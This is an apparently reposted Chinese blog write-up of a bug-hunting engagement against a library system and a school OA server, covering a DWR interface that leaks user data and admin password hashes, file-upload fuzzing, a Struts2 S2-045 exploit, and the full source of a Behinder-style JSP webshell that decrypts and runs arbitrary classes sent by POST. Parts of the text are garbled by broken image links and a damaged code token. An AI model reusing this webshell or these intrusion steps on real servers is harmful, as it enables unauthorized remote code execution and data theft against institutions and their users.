作者: Echo: time:2021-01-02/22:02
前言:
團隊src小組漏洞定向挖掘程序中,找到某目標,發現還挺有意思的,便記錄了下來;是java的dwr框架出了問題,已經拿到shell了;后續有了一些新的認識,還拿到學校某oa的shell,
0x00 發現某資產圖書館
1.當時就隨手點了一下忘記密碼,發現模塊正常,有意思的是輸入admin,姓名處會識別:系統管理員,
2.輸入別的資訊,回傳用戶名不存在,很明顯這里有介面(雖然不知道是什么)
- 然后還發現重置密碼模塊可以訪問,但點擊修改的按鈕失效,
0x01 任意用戶密碼重置
-
手里還有別的事情,發現模塊不能用后,丟給up哥,過了10來分鐘,up哥就說response請求里有回傳的內容
這里就很有意思了,框架是tomcat的DWR,在密碼重置POST請求還沒發出去之前,服務器主動POST請求,,(這些都是后面摸索出的)
-
查看原始碼發現寫了個onkeyup事件,也就是說輸入結束后會執行check();而check()又會呼叫這個UserDWR.getUsUserMap
-
然后順著這個getUserMap找到了DWR的介面地址,構造引數發現確實和理解的一樣,(當然這都是后面做完getshell發現的)
-
拿著管理的md5解密somd5,結果是xxxxxxx+出生年月
0x02 后臺二處檔案上傳點
<!-- -->
-
banner處
-
某書房的設定處,
-
別的地方,發現eweb編輯器,同時還看到加了后綴jsp,(這里想到可能已經有前者來過了),發現這編輯器是壞的,涉及到javascript:xxx()函式全部不能呼叫
-
發現幾乎整個站都是這樣,然后這里借鑒以前某次拿shell檔案上傳的手法,先傳個txt,
不考慮后綴的事情,
發現很多地方都可以傳jpg和txt,只要傳jsp就有問題,通過長時間fuzz,索性直接傳個無內容的jsp后綴,發現banner處可以,
[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳
上傳成功后會GET這個地址,
<!-- -->
-
像這樣苛刻的環境,通常手法是傳個上傳馬,發現success
-
然后這里通過漫長的fuzz,不管是傳cmd馬還是咋,全部陣亡
然后發現jsp中不含表單form就能上傳成功,但決議就是上面這種情況,,,
之前回想起學校某oa也存在這樣的情況,當時查了資料可能是tomcat和jdk版本不匹配和i/o不能呼叫的問題,,總之解釋有一堆,
-
絕境看up哥,
<!-- -->
-
up哥通過冰蝎馬連上去,這里瞬間有意思了,拿到樣本后,
<%@page
import=“java.util.*,javax.crypto.*,javax.crypto.spec.*”%><%!class
U extends ClassLoader{U(ClassLoader c){super?;}public Class g(byte
[]b){return super.defineClass(b,0,b.length);}}%><%if
(request.getMethod().equals(“POST”)){String
k=“xxxxxxx”;session.putValue(“u”,k);Cipher
c=Cipher.getInstance(“AES”);c.init(2,new
SecretKeySpec(k.getBytes(),“AES”));new
U(this.getClass().getClassLoader()).g(c.doFinal(new
sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> -
研究冰蝎
發現冰蝎不呼叫java的i/0,通過匯入classloader,通過ClassLoader將class檔案加載到JVM來命令執行;和傳統的webshell通過Runtime類,客戶端向服務端發送命令,服務端獲取內容然后帶入exec當中,
得出的結論就是:存在java環境就有jvm,兼容性極大的提升,從0到1,讓可以做的事情無線放大,敬佩
-
冰蝎馬getshell
看到太多的嘗試,都是jpg,,充滿了無奈,
0x03 峰會路轉-學校OAgetshell
2022-01-02 23:13 很困了,簡單的寫個經過,
后來,發現半年前,學校的oa便是苛刻的st2環境,,想到再次嘗試,
<!-- -->
-
找到站點,
雖然已經過去一年了,但憑微薄的記憶還是找到了這個站,但是前臺的s2好像修復了,
-
探測到s2-045
但印象中后臺oa同時還存在s2-45,這個估計管理想不到,,(一年多了不知道咋記起來的)
-
冰蝎馬直接getshell
<!-- -->
-
一發入魂,直接拿下
[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-H4tQuXSZ-1641171420559)(media/image21.png)]{width=“5.756944444444445in”
height=“3.470833333333333in”}
444444444in"}
<!-- -->
-
一發入魂,直接拿下
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/402656.html
標籤:其他